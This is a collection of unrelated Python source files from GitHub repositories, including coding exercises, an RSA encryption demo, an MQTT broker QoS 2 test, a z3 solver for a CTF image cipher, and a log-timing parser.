+ \" кухня!\")\r\n \r\n def open_restaurant(self):\r\n print(\"Ресторан \" + self.restaurant_name.title() + \" открыт!\")\r\n\r\n def read_number_served(self):\r\n \"\"\"Выводим кол-во обслуженных посетителей.\"\"\"\r\n print(\"Количество обслуженных посетителей: \" + \r\n str(self.number_served) + \".\")\r\n\r\n def set_number_served(self, num):\r\n \"\"\"Метод позволяет задать кол-во посетителей.\"\"\"\r\n if num >= self.number_served:\r\n self.number_served = num\r\n else:\r\n print(\"Вы не можете задать меньшее число пометителей!\")\r\n \r\n def increment_number_served(self, new_num):\r\n \"\"\"Метод изменяет кол-во посетителей с приращением.\"\"\"\r\n if new_num <= 0:\r\n print(\"Вы не можете уменьшать число посетителей!\")\r\n self.number_served += new_num\r\n else:\r\n self.number_served += new_num\r\n\r\nrestautant_1 = Restaurant('миямото', 'японская')\r\nrestautant_1.describe_restaurant()\r\nrestautant_1.open_restaurant()\r\nrestautant_1.number_served = 3\r\nrestautant_1.read_number_served()\r\nrestautant_1.number_served = 8\r\nrestautant_1.read_number_served()\r\n\r\nrestautant_2 = Restaurant('сашими', 'японская')\r\nrestautant_2.describe_restaurant()\r\nrestautant_2.open_restaurant()\r\nrestautant_2.set_number_served(12)\r\nrestautant_2.read_number_served()\r\nrestautant_2.increment_number_served(3)\r\nrestautant_2.read_number_served()\r\nrestautant_2.set_number_served(9)\r\nrestautant_2.read_number_served()\r\nrestautant_2.increment_number_served(1)\r\nrestautant_2.read_number_served()","repo_name":"AlexProvatorov/python_crash_course","sub_path":"topic_9/ex_9.4.py","file_name":"ex_9.4.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18532791497","text":"\"\"\"\nWelcome. 
In this kata, you are asked to square every digit of a number and concatenate them.\n\nFor example, if we run 9119 through the function, 811181 will come out, because 92 is 81 and 12 is 1.\n\nNote: The function accepts an integer and returns an integer\n\"\"\"\n\n\ndef square_digits(num):\n \"\"\"\n Iterates through each digit\n Adds the square of each digit to the sum\n \"\"\"\n digits = str(num)\n squares = ''\n for digit in digits:\n squares += str(int(digit)**2)\n return int(squares)\n\n\ndef square_digits(num):\n \"\"\"\n Join the square to a string for each digit\n \"\"\"\n return int(''.join(str(int(n)**2) for n in str(num)))\n\n\nif __name__ == '__main__':\n print(square_digits(9119))\n","repo_name":"cbraissant/codewars","sub_path":"python/01_square_digits.py","file_name":"01_square_digits.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74213305474","text":"# Inspired from http://coding4streetcred.com/blog/post/Asymmetric-Encryption-Revisited-(in-PyCrypto)\n# PyCrypto docs available at https://www.dlitz.net/software/pycrypto/api/2.6/\nimport random\n\n# import MySQLdb\nimport pyqrcode\nfrom Crypto import Random\nimport string\n\nfrom Crypto.Cipher import PKCS1_OAEP\nfrom Crypto.PublicKey import RSA\nimport base64\nimport hashlib\n\n\n\n\ndef generate_keys():\n\t\t# RSA modulus length must be a multiple of 256 and >= 1024\n\t\tmodulus_length = 256*4 # use larger value in production\n\t\trandomnum=''.join(random.choice(string.hexdigits) for n in range(modulus_length))\n\t\tpublickey = RSA.generate(modulus_length, Random.new().read)\n\t\tprivatekey = publickey.publickey()\n\t\treturn privatekey, publickey\n\ndef encrypt_message(a_message , privatekey):\n\t\t# print(publickey.encrypt(\"Hello.\".encode('utf-8'), 32))\n\t\tencryptor = PKCS1_OAEP.new(privatekey)\n\t\tencrypted = encryptor.encrypt(a_message.encode('utf-8'))\n\t\t# encrypted_msg = privatekey.encrypt(a_message.encode('utf-8'), 32)[0]\n\t\tencoded_encrypted_msg = base64.b64encode(encrypted) # base64 encoded strings are database friendly\n\t\treturn encoded_encrypted_msg\n\n\n\ndef decrypt_message(encoded_encrypted_msg, publickey):\n\t\tdecoded_encrypted_msg = base64.b64decode(encoded_encrypted_msg)\n\n\n\t\t# print('okkkk')\n\t\t# print(decoded_encrypted_msg)\n\t\t# print('end')\n\t\tencryptor = PKCS1_OAEP.new(publickey)\n\t\tdecoded_decrypted_msg = encryptor.decrypt(decoded_encrypted_msg)\n\t\treturn decoded_decrypted_msg\n\n########## BEGIN ##########\n\n# a_message = \"The quick brown fox jumped over the lazy dog\"\n# privatekey , publickey = generate_keys()\n# encrypted_msg = encrypt_message(a_message , privatekey )\n# decrypted_msg = decrypt_message(encrypted_msg, publickey)\n#\n# print (\"%s - (%d)\" % (privatekey.exportKey() , len(privatekey.exportKey())))\n# print (\"%s - (%d)\" % (publickey.exportKey() , len(publickey.exportKey())))\n# print (\" Original content: %s - (%d)\" % (a_message, len(a_message)))\n# print (\"Encrypted message: %s - (%d)\" % (encrypted_msg, len(encrypted_msg)))\n# print (\"Decrypted message: %s - (%d)\" % (decrypted_msg, len(decrypted_msg)))\n\n\nprivatekey, publickey = generate_keys()\n# print(\"pub\" + str(privatekey.exportKey()))\nencrypted_msg = encrypt_message(\"hello\", privatekey)\n# print(\"ec\", str(encrypted_msg))\n# con=MySQLdb.connect(host='localhost',port=3308,user='root',passwd='root',db='uniqueid')\n# cmd=con.cursor()\n# print(publickey)\n# 
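key-naming note:\n# RSA.generate() returns the PRIVATE key and .publickey() derives the\n# public half, so the two names in generate_keys() are swapped; the flow\n# still works because the variable passed to encrypt_message() holds the\n# real public key. A correctly named sketch of the same flow:\n#   priv = RSA.generate(1024, Random.new().read)\n#   pub = priv.publickey()\n#   ct = base64.b64encode(PKCS1_OAEP.new(pub).encrypt(b'hello'))\n#   pt = PKCS1_OAEP.new(priv).decrypt(base64.b64decode(ct))\n# 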
print(type(publickey))\nky=publickey.exportKey(\"PEM\")\npky=privatekey.exportKey(\"PEM\")\n\n\n\n# key = publickey[0]\n\n# pk = RSA.importKey(key)\n# print('pk--------------', pk)\ndecrypted_msg = decrypt_message(encrypted_msg, publickey)\n# print(\"decy msg\" , decrypted_msg)\n\nwith open (\"private.pem\", \"w\") as prv_file:\n\tprint(\"{}\".format(publickey.exportKey()), file=prv_file)\n","repo_name":"Jisphilip/securuty","sub_path":"project/rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32700394794","text":"from citychat_server.cityform.fields import Field\n\n\nclass Form:\n def __init__(self, method=None, id_prefix=None, attributes=None):\n self.method = method\n self.id_prefix = id_prefix\n self.attributes = attributes or {}\n self.values = {k: None for k in self.fields.keys()}\n self.errors = {k: [] for k in self.fields.keys()}\n\n @property\n def _fields(self):\n return [\n (key, value)\n for key, value in self.__class__.__dict__.items()\n if isinstance(value, Field)\n ]\n\n @property\n def fields(self):\n return {field[0]: field[1] for field in self._fields}\n\n @property\n def placeholder_values(self):\n return {k: '' for k in self.values.keys()}\n\n @property\n def placeholder_errors(self):\n return {k: '' for k in self.errors.keys()}\n\n def populate(self, values):\n if isinstance(values, dict):\n for k, v in values.items():\n if k in self.values:\n self.values[k] = v\n\n def pre_filter(self):\n for k, f in self.fields.items():\n for p in f.pre_filters:\n self.values[k] = p(self.values[k])\n\n def post_filter(self):\n for k, f in self.fields.items():\n for p in f.post_filters:\n self.values[k] = p(self.values[k])\n\n def validate(self):\n valid = True\n self.pre_filter()\n\n for k, f in self.fields.items():\n for v in f.validators:\n errors = v.validate(label=f.label, value=self.values[k])\n\n if errors:\n valid = False\n self.errors[k] = errors\n\n if valid:\n self.post_filter()\n\n return valid\n\n def to_json(self):\n return {\n 'args': {\n 'method': self.method.lower(),\n 'id': self.id_prefix + 'Form',\n **self.attributes\n },\n 'fields': [\n (f[0], f[1].to_list(self.id_prefix, f[0]))\n for f in self._fields\n ],\n 'values': self.placeholder_values,\n 'errors': self.placeholder_errors\n }\n","repo_name":"Kamide/citychat","sub_path":"server/citychat_server/cityform/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2477378615","text":"#\n# @lc app=leetcode id=127 lang=python3\n#\n# [127] Word Ladder\n#\n\n# @lc code=start\nimport collections\n\nclass Solution:\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n dicts = collections.defaultdict(list)\n for word in wordList:\n for i in range(len(word)):\n dicts[word[:i] + '#' + word[i + 1:]].append(word)\n \n seen = set()\n queue = collections.deque([(beginWord, 1)])\n while queue:\n word, step = queue.popleft()\n if word == endWord: return step\n seen.add(word)\n for i in range(len(word)):\n for sibling in dicts[word[:i] + '#' + word[i + 1:]]:\n if sibling not in seen:\n queue.append((sibling, step + 1))\n return 0\n# @lc 
code=end","repo_name":"OhYoooo/Leetcode","sub_path":"python/8.Tree/bfs/127.word-ladder.py","file_name":"127.word-ladder.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38165939482","text":"\"\"\"\nGather possible decimal point\nMarket Forcats : https://coincap.io/assets/bitcoin\nApi Documentation : https://docs.coincap.io/\n\"\"\"\n\nimport requests\n\nimport json\n\n# url = \"http://api.coincap.io/v2/assets/bitcoin/history?interval=d1&start=1664323200000&end=1664928000000\"\nurl = \"http://api.coincap.io/v2/assets/bitcoin/history?interval=d1\"\n\npayload = {}\nheaders = {}\n\nresponse = requests.request(\"GET\", url, headers=headers, data=payload)\n\njson_data = json.loads(response.text.encode('utf8'))\n\"\"\"\nThe average of last 7 days, 25 days and 90 days price.\n\"\"\"\n\n\ndef all_data(json_data):\n price_list = []\n for price in json_data:\n price_list.append(int(float(price['priceUsd'])))\n print(price_list)\n return price_list\n\n\nprice_list = all_data(json_data['data'])\n\n\ndef day_data(price_list, days):\n for btc_price in range(days):\n # print(len(price_list))\n print(price_list[len(price_list)-1-btc_price])\n print(-1-btc_price)\n # print(btc_price)\n\n# day_data(price_list, 7)\n# day_data(price_list, 25)\nday_data(price_list, 90)\n","repo_name":"sushen/mathandmoremath","sub_path":"4. Decimal System/moving_average.py","file_name":"moving_average.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"35448364225","text":"import re\n\n\n# regex\nregexs = {\n 1: re.compile(\"^Where is (\\w+)\\?$\"),\n 2: re.compile(\"^Where is the (\\w+)\\?$\"),\n 3: re.compile(\"^Where was ([\\w ]+) before the (\\w+)\\?$\"),\n 4.1: re.compile(\"^What is ([\\w ]+) (\\w+) of\\?$\"),\n 4.2: re.compile(\"^What is (\\w+) of the (\\w+)\\?$\"),\n 5.1: re.compile(\"^What did (\\w+) give to (\\w+)\\?$\"),\n 5.2: re.compile(\"^Who gave the (\\w+) to (\\w+)\\?$\"),\n 5.3: re.compile(\"^Who did (\\w+) give the (\\w+) to\\?$\"),\n 5.4: re.compile(\"^Who gave the (\\w+)\\?$\"),\n 5.5: re.compile(\"^Who received the (\\w+)\\?$\"),\n 6: re.compile(\"Is (\\w+) in the (\\w+)\\?$\"),\n 7: re.compile(\"^How many objects is (\\w+) carrying\\?$\"),\n 8: re.compile(\"^What is (\\w+) carrying\\?$\"),\n # 9: same as 6\n # 10: same as 6\n # 11: same as 1\n # 12: same as 1\n # 13: same as 13\n # 14: same as 3\n 15: re.compile(\"^What is (\\w+) afraid of\\?$\"),\n 16: re.compile(\"^What color is (\\w+)\\?$\"),\n 17: re.compile(\"^Is the ([\\w+ ]+) (below|above|to the left of|to the right of) the ([\\w ]+)\\?$\"),\n 18.1: re.compile(\"^Is the ([\\w ]+) (bigger|smaller) than the ([\\w ]+)\\?$\"),\n 18.2: re.compile(\"^Does the ([\\w ]+) fit in the ([\\w ]+)\\?$\"),\n 19: re.compile(\"^How do you go from the (\\w+) to the (\\w+)\\?$\"),\n 20.1: re.compile(\"^Where will (\\w+) go\\?$\"),\n 20.2: re.compile(\"^Why did (\\w+) go to the (\\w+)\\?$\"),\n 20.3: re.compile(\"^Why did (\\w+) get the (\\w+)\\?$\"),\n}\n\n\nclass C06(object):\n @staticmethod\n def format(containee, container, answer=None):\n if answer == \"yes\":\n return \"{} is in the {}.\".format(containee, container)\n elif answer == \"no\":\n return \"{} is not in the {}.\".format(containee, container)\n elif answer == \"maybe\":\n return \"{} is maybe in the {}.\".format(containee, container)\n raise Exception(\"Unrecognized answer: 
{}\".format(answer))\n\nclass C08(object):\n @staticmethod\n def format(subject, answer=None):\n if answer == \"nothing\":\n return \"{} is carrying nothing.\".format(subject)\n else:\n return \"{} is carrying the {answer}.\".format(subject, answer=answer)\n\n\nclass C18_1(object):\n @staticmethod\n def format(subject, adjective, object, answer=None):\n if answer == \"yes\":\n return \"The {} is {} than the {}.\".format(subject, adjective, object)\n elif answer == \"no\":\n return \"The {} is not {} than the {}.\".format(subject, adjective, object)\n raise Exception(\"Unrecognized answer: {}\".format(answer))\n\n\nclass C18_2(object):\n @staticmethod\n def format(subject, object, answer=None):\n if answer == \"yes\":\n return \"The {} fits in the {}.\".format(subject, object)\n elif answer == \"no\":\n return \"The {} does not fit in the {}.\".format(subject, object)\n raise Exception(\"Unrecognized answer: {}\".format(answer))\n\n\nout_strings = {\n 1: \"{0} is in the {answer}.\",\n 2: \"The {0} is in the {answer}.\",\n 3: \"The {0} is in the {answer}.\",\n 4.1: \"The {0} is {1} of the {answer}.\",\n 4.2: \"The {answer} is {0} of the {1}.\",\n 5.1: \"{0} gave the {answer} to {1}.\",\n 5.2: \"{answer} gave the {0} to {1}.\",\n 5.3: \"{0} gave the {1} to {answer}.\",\n 5.4: \"{0} gave the {answer}.\",\n 5.5: \"{answer} received the {0}.\",\n 6: C06,\n 7: \"{0} is carrying {answer} objects.\",\n 8: C08,\n # 9: same as 6\n # 10: same as 6\n # 11: same as 1\n # 12: same as 1\n # 13: same as 13\n # 14: same as 3\n 15: \"{0} is afraid of {answer}.\",\n 16: \"The color of {0} is {answer}.\",\n 17: \"The {0} is {1} the {2}.\",\n 18.1: C18_1,\n 18.2: C18_2,\n 19: \"You go {answer} from the {0} to the {1}.\",\n 20.1: \"{0} will go to the {answer}.\",\n 20.2: \"{0} went to the {1} because he is {answer}.\",\n 20.3: \"{0} got the {1} because he is {answer}.\"\n\n}\n\n\ndef apply(regex, string, question, answer):\n result = regex.match(question)\n if result:\n return string.format(*result.groups(), answer=answer).capitalize()\n return result\n\n\ndef qa2hypo(question, answer):\n question = question.lstrip().rstrip()\n answer = answer.lstrip().rstrip()\n for task, regex in regexs.items():\n string = out_strings[task]\n result = apply(regex, string, question, answer)\n if result:\n return result\n raise Exception(\"Unknown question format: {}\".format(question))\n\n\ndef main():\n question = \"Where is Mary?\"\n answer = \"office\"\n print(qa2hypo(question, answer))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"seominjoon/qrn","sub_path":"qa2hypo.py","file_name":"qa2hypo.py","file_ext":"py","file_size_in_byte":4529,"program_lang":"python","lang":"en","doc_type":"code","stars":137,"dataset":"github-code","pt":"61"} +{"seq_id":"9709101917","text":"import functools\nfrom PIL import Image\nfrom z3 import *\n\nkey = \"k3Y\"\nn = 256\n\ndef sox(n, d):\n\tx, y, t = 0, 0, d\n\tfor s in range(n - 1):\n\t\tu = 1 & t // 2\n\t\tv = 1 & t ^ u\n\t\tx, y = spin(2**s, x, y, u, v)\n\t\tx += 2**s * u\n\t\ty += 2**s * v\n\t\tt = t // 4\n\treturn x, y\n\ndef spin(n, x, y, u, v):\n\tif v == 0:\n\t\tif u == 1:\n\t\t\tx = n - 1 - x\n\t\t\ty = n - 1 - y\n\t\tx, y = y, x\n\treturn x, y\n\nimport pickle\n\nwith open(\"hilbert.json\", 'rb') as f:\n\ttable = pickle.load(f)\n\nbuf = [Int(f\"F_{i}\") for i in range(n**2)]\ndef encrypt(_, key, n):\n\t_msg = buf\n\t_key = [ord(_) for _ in key]\n\t\n\timg = Image.open(\"enc.png\")\n\timg = img.rotate(90)\n\tpix = img.load()\n\n\tactual_msg = [0 for _ in range(n**2)]\n\n\tfor 
(x, y), v in table.items():\n\t\tactual_msg[v] = pix[x, y][0] \n\n\tfor _ in range(len(key)):\n\t\tw = len(_key)\n\t\th = n**2 // w + 1\n\t\tarr = [[_msg[w*x + y] if w*x + y < n**2 else None for x in range(h)] for y in range(w)]\n\t\t_conf = sorted([(_key[i], i) for i in range(w)])\n\t\t_marshal = [arr[_conf[i][1]] for i in range(w)]\n\t\t_msg = functools.reduce(lambda a, r: a + _marshal[r], range(w), [])\n\t\t_msg = list(filter(lambda x: x is not None, _msg))\n\n\t\t_msg = [(_msg[_] + _key[_ % w]) % 256 for _ in range(n**2)]\n\n\t\t# new z3 solve\n\t\tsolver = Solver()\n\n\t\tfor sym, actual in zip(_msg, actual_msg):\n\t\t\tsolver.add(sym == actual)\n\t\t\n\t\tfor sym in buf:\n\t\t\tsolver.add(sym > 32)\n\t\t\tsolver.add(sym < 127)\n\t\n\treturn solver\n\t\t\t\t\nprint(\"BUILDING EQUATION\")\nsolver = encrypt(None, key, n)\n\nprint(\"SOLVING FOR SATISFYING FLAG\")\nif solver.check() == sat:\n\tm = solver.model()\n\tprint(''.join(chr(m[b].as_long()) for b in buf))","repo_name":"abhishekg999/CTFWriteups","sub_path":"CryptoCTF/Bertrand/src/sym.py","file_name":"sym.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"33934101482","text":"#!/usr/bin/env python3\n\n# Test for issue 1322:\n\n## restart dimq\n#sudo systemctl restart dimq.service\n#\n## listen on topic1\n#dimq_sub -t \"topic1\"\n#\n## publish to topic1 without clean session\n#dimq_pub -t \"topic1\" -q 2 -c --id \"foobar\" -m \"message1\"\n## message1 on topic1 is received as expected\n#\n## publish to topic2 without clean session\n## IMPORTANT: no subscription to this topic is present on broker!\n#dimq_pub -t \"topic2\" -q 2 -c --id \"foobar\" -m \"message2\"\n## this goes nowhere, as no subscriber present\n#\n## publish to topic1 without clean session\n#dimq_pub -t \"topic1\" -q 2 -c --id \"foobar\" -m \"message3\"\n## message3 on topic1 IS NOT RECEIVED\n#\n## listen on topic2 \n#dimq_sub -t \"topic2\"\n#\n## publish to topic1 without clean session\n#dimq_pub -t \"topic1\" -q 2 -c --id \"foobar\" -m \"message4\"\n## message2 on topic2 is received incorrectly\n#\n## publish to topic1 without clean session\n#dimq_pub -t \"topic1\" -q 2 -c --id \"foobar\" -m \"message5\"\n## message5 on topic1 is received as expected (message4 was dropped)\n\n\n\nfrom dimq_test_helper import *\n\ndef do_test(proto_ver):\n rc = 1\n keepalive = 60\n pub_connect_packet = dimq_test.gen_connect(\"pub\", keepalive=keepalive, clean_session=False, proto_ver=proto_ver, session_expiry=60)\n pub_connack1_packet = dimq_test.gen_connack(rc=0, proto_ver=proto_ver)\n pub_connack2_packet = dimq_test.gen_connack(rc=0, flags=1, proto_ver=proto_ver)\n\n sub1_connect_packet = dimq_test.gen_connect(\"sub1\", keepalive=keepalive, proto_ver=proto_ver)\n sub1_connack_packet = dimq_test.gen_connack(rc=0, proto_ver=proto_ver)\n\n sub2_connect_packet = dimq_test.gen_connect(\"sub2\", keepalive=keepalive, proto_ver=proto_ver)\n sub2_connack_packet = dimq_test.gen_connack(rc=0, proto_ver=proto_ver)\n\n mid = 1\n subscribe1_packet = dimq_test.gen_subscribe(mid, \"topic1\", 0, proto_ver=proto_ver)\n suback1_packet = dimq_test.gen_suback(mid, 0, proto_ver=proto_ver)\n\n mid = 1\n subscribe2_packet = dimq_test.gen_subscribe(mid, \"topic2\", 0, proto_ver=proto_ver)\n suback2_packet = dimq_test.gen_suback(mid, 0, proto_ver=proto_ver)\n\n # All publishes have the same mid\n mid = 1\n pubrec_packet = dimq_test.gen_pubrec(mid, proto_ver=proto_ver)\n pubrel_packet = 
dimq_test.gen_pubrel(mid, proto_ver=proto_ver)\n pubcomp_packet = dimq_test.gen_pubcomp(mid, proto_ver=proto_ver)\n\n publish1s_packet = dimq_test.gen_publish(\"topic1\", qos=2, mid=mid, payload=\"message1\", proto_ver=proto_ver)\n publish2s_packet = dimq_test.gen_publish(\"topic2\", qos=2, mid=mid, payload=\"message2\", proto_ver=proto_ver)\n publish3s_packet = dimq_test.gen_publish(\"topic1\", qos=2, mid=mid, payload=\"message3\", proto_ver=proto_ver)\n publish4s_packet = dimq_test.gen_publish(\"topic1\", qos=2, mid=mid, payload=\"message4\", proto_ver=proto_ver)\n publish5s_packet = dimq_test.gen_publish(\"topic1\", qos=2, mid=mid, payload=\"message5\", proto_ver=proto_ver)\n\n publish1r_packet = dimq_test.gen_publish(\"topic1\", qos=0, payload=\"message1\", proto_ver=proto_ver)\n publish2r_packet = dimq_test.gen_publish(\"topic2\", qos=0, payload=\"message2\", proto_ver=proto_ver)\n publish3r_packet = dimq_test.gen_publish(\"topic1\", qos=0, payload=\"message3\", proto_ver=proto_ver)\n publish4r_packet = dimq_test.gen_publish(\"topic1\", qos=0, payload=\"message4\", proto_ver=proto_ver)\n publish5r_packet = dimq_test.gen_publish(\"topic1\", qos=0, payload=\"message5\", proto_ver=proto_ver)\n\n port = dimq_test.get_port()\n broker = dimq_test.start_broker(filename=os.path.basename(__file__), port=port)\n\n try:\n sub1 = dimq_test.do_client_connect(sub1_connect_packet, sub1_connack_packet, timeout=10, port=port)\n dimq_test.do_send_receive(sub1, subscribe1_packet, suback1_packet, \"suback1\")\n\n pub = dimq_test.do_client_connect(pub_connect_packet, pub_connack1_packet, timeout=10, port=port)\n dimq_test.do_send_receive(pub, publish1s_packet, pubrec_packet, \"pubrec1\")\n dimq_test.do_send_receive(pub, pubrel_packet, pubcomp_packet, \"pubcomp1\")\n pub.close()\n\n dimq_test.expect_packet(sub1, \"publish1\", publish1r_packet)\n pub = dimq_test.do_client_connect(pub_connect_packet, pub_connack2_packet, timeout=10, port=port)\n dimq_test.do_send_receive(pub, publish2s_packet, pubrec_packet, \"pubrec2\")\n dimq_test.do_send_receive(pub, pubrel_packet, pubcomp_packet, \"pubcomp2\")\n pub.close()\n\n # We expect nothing on sub1\n dimq_test.do_ping(sub1, error_string=\"pingresp1\")\n\n pub = dimq_test.do_client_connect(pub_connect_packet, pub_connack2_packet, timeout=10, port=port)\n dimq_test.do_send_receive(pub, publish3s_packet, pubrec_packet, \"pubrec3\")\n dimq_test.do_send_receive(pub, pubrel_packet, pubcomp_packet, \"pubcomp3\")\n pub.close()\n\n dimq_test.expect_packet(sub1, \"publish3\", publish3r_packet)\n sub2 = dimq_test.do_client_connect(sub2_connect_packet, sub2_connack_packet, timeout=10, port=port)\n dimq_test.do_send_receive(sub2, subscribe2_packet, suback2_packet, \"suback2\")\n\n pub = dimq_test.do_client_connect(pub_connect_packet, pub_connack2_packet, timeout=10, port=port)\n dimq_test.do_send_receive(pub, publish4s_packet, pubrec_packet, \"pubrec4\")\n dimq_test.do_send_receive(pub, pubrel_packet, pubcomp_packet, \"pubcomp4\")\n pub.close()\n\n # We expect nothing on sub2\n dimq_test.do_ping(sub2, error_string=\"pingresp2\")\n \n dimq_test.expect_packet(sub1, \"publish4\", publish4r_packet)\n pub = dimq_test.do_client_connect(pub_connect_packet, pub_connack2_packet, timeout=10, port=port)\n dimq_test.do_send_receive(pub, publish5s_packet, pubrec_packet, \"pubrec5\")\n dimq_test.do_send_receive(pub, pubrel_packet, pubcomp_packet, \"pubcomp5\")\n pub.close()\n\n # We expect nothing on sub2\n dimq_test.do_ping(sub2, error_string=\"pingresp2\")\n \n 
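# A minimal sketch of the four-step QoS 2 exchange this test drives, for
# readers unfamiliar with the flow. The send/recv callables and packet
# values here are illustrative stand-ins, not dimq_test helpers:
def qos2_publish(send, recv, publish_packet, pubrec_packet, pubrel_packet, pubcomp_packet):
    """One QoS 2 publish: PUBLISH -> PUBREC -> PUBREL -> PUBCOMP."""
    send(publish_packet)               # step 1: deliver the message
    assert recv() == pubrec_packet     # step 2: broker acknowledges receipt
    send(pubrel_packet)                # step 3: release the message id
    assert recv() == pubcomp_packet    # step 4: broker confirms completion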
dimq_test.expect_packet(sub1, \"publish5\", publish5r_packet)\n        rc = 0\n\n        sub2.close()\n        sub1.close()\n    except dimq_test.TestError:\n        pass\n    finally:\n        broker.terminate()\n        broker.wait()\n        (stdo, stde) = broker.communicate()\n        if rc:\n            print(stde.decode('utf-8'))\n            print(\"proto_ver=%d\" % (proto_ver))\n            exit(rc)\n\n\ndo_test(proto_ver=4)\ndo_test(proto_ver=5)\nexit(0)\n","repo_name":"ahsefati/DimQ","sub_path":"test/broker/02-subpub-qos2-1322.py","file_name":"02-subpub-qos2-1322.py","file_ext":"py","file_size_in_byte":6357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"23415125418","text":"from pathlib import Path\n\nroot_dir = Path(__file__).parent.parent.resolve()  # directory of source root\n\nCONFIG_PATH = root_dir / 'config'  # config file with flags and paths\n\nGRAPHS_DIR = root_dir / 'data'  # root directory to store all graph data\nPICS_DIR = root_dir / 'pics'  # directory to store pictures\nRESULT_DIR = root_dir / 'results'  # directory to store results\nDATASET_DIR = root_dir / 'datasets'  # directory to store generated datasets\nSTATISTIC_DIR = root_dir / 'statistic'\n\nLFR_DIR = root_dir / 'soft' / 'lfr' / 'benchmark'  # path to LFR binaries\nSNAP_DIR = root_dir / 'soft' / 'snap'  # path to SNAP binaries\n\n# Should go before any cython imports. By calling here it is run once\nfrom setup import build_cython\nbuild_cython(root_dir, SNAP_DIR)\n","repo_name":"crawling-framework/crawling-framework.github.io","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
{"seq_id":"13355633704","text":"#!/usr/bin/python\nimport sys\nimport os\nimport json\nimport subprocess\nimport time\nimport numpy as np\n\n\"\"\"\nThis script is written to extract the time (ms) taken to perform the various operations in GLRM\nmodel iteration. You should not use this for anything else. 
Provide the absolute path to the data\nfile if it is not in the same directory as this script.\n\"\"\"\n\n# --------------------------------------------------------------------\n# Main program\n# --------------------------------------------------------------------\n\ng_test_root_dir = os.path.dirname(os.path.realpath(__file__)) # directory where we are running out code from\n\ng_initialXY = \"Time taken (ms) to initializeXY with\" # text of interest\ng_reguarlize_Y = \"Time taken (ms) to calculate regularize_y\"\ng_regularize_X_objective = \"Time taken (ms) to calculate regularize_x and calculate\"\ng_updateX = \"Time taken (ms) to updateX\"\ng_updateY = \"Time taken (ms) to updateY\"\ng_objective = \"Time taken (ms) to calculate new objective function value\"\ng_stepsize = \"Time taken (ms) to set the step size\"\ng_history = \"Time taken (ms) to history of run\"\n\n\ndef extractRunInto(javaLogText):\n \"\"\"\n This function will extract the various operation time for GLRM model building iterations.\n\n :param javaLogText:\n :return:\n \"\"\"\n global g_initialXY\n global g_reguarlize_Y\n global g_regularize_X_objective\n global g_updateX\n global g_updateY\n global g_objective\n global g_stepsize\n global g_history\n\n\n if os.path.isfile(javaLogText):\n\n run_result = dict()\n run_result[\"total time (ms)\"] = []\n run_result[\"initialXY (ms)\"] = []\n run_result[\"regularize Y (ms)\"] = []\n run_result[\"regularize X and objective (ms)\"] = []\n run_result[\"update X (ms)\"] = []\n run_result[\"update Y (ms)\"] = []\n run_result[\"objective (ms)\"] = []\n run_result[\"step size (ms)\"] = []\n run_result[\"update history (ms)\"] = []\n\n total_run_time = -1\n val = 0.0\n with open(javaLogText, 'r') as thefile: # go into tempfile and grab test run info\n for each_line in thefile:\n temp_string = each_line.split()\n\n if len(temp_string) > 0:\n val = temp_string[-1].replace('\\\\','')\n\n if g_initialXY in each_line: # start of a new file\n if total_run_time > 0: # update total run time\n run_result[\"total time (ms)\"].append(total_run_time)\n total_run_time = 0.0\n else:\n total_run_time = 0.0\n\n run_result[\"initialXY (ms)\"].append(float(val))\n total_run_time = total_run_time+float(val)\n\n if g_reguarlize_Y in each_line:\n run_result[\"regularize Y (ms)\"].append(float(val))\n total_run_time = total_run_time+float(val)\n\n if g_regularize_X_objective in each_line:\n run_result[\"regularize X and objective (ms)\"].append(float(val))\n total_run_time = total_run_time+float(val)\n\n if g_updateX in each_line:\n run_result[\"update X (ms)\"].append(float(val))\n total_run_time = total_run_time+float(val)\n\n if g_updateY in each_line:\n run_result[\"update Y (ms)\"].append(float(val))\n total_run_time = total_run_time+float(val)\n\n if g_objective in each_line:\n run_result[\"objective (ms)\"].append(float(val))\n total_run_time = total_run_time+float(val)\n\n if g_stepsize in each_line:\n run_result[\"step size (ms)\"].append(float(val))\n total_run_time = total_run_time+float(val)\n\n if g_history in each_line:\n run_result[\"update history (ms)\"].append(float(val))\n total_run_time = total_run_time+float(val)\n\n run_result[\"total time (ms)\"].append(total_run_time) # save the last one\n print(\"Run result summary: \\n {0}\".format(run_result))\n\n else:\n print(\"Cannot find your java log file. Nothing is done.\\n\")\n\n\ndef main(argv):\n \"\"\"\n Main program. 
